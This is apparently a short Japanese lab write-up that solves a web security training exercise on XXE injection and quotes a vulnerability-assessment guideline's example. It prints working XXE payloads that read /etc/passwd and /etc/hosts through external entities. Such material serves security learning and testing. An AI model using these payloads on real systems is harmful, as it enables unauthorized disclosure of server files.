Hello there, ('ω')ノ
外部エンティティを使用してXXEを悪用してファイルを取得を。
Check stockをクリックして。
履歴からxmlを見つけてリピータへ。
下記のペイロードを追加して、Sendすると。
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
&xxe;
クリアできた。
たとえば、脆弱性診断ガイドラインには下記のように書いてあって。
&xxe;をどこに入力してよいかわからない場合だと明示的に指摘する方法もあって。
診断をする場所は、リクエストにXMLが含まれている箇所とのことで。
元の値:
<?xml version="1.0" encoding="ISO-8859-1"?>
<foo>test</foo>
試行例:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/hosts" >]>
<foo>&xxe;</foo>
Best regards, (^^ゞ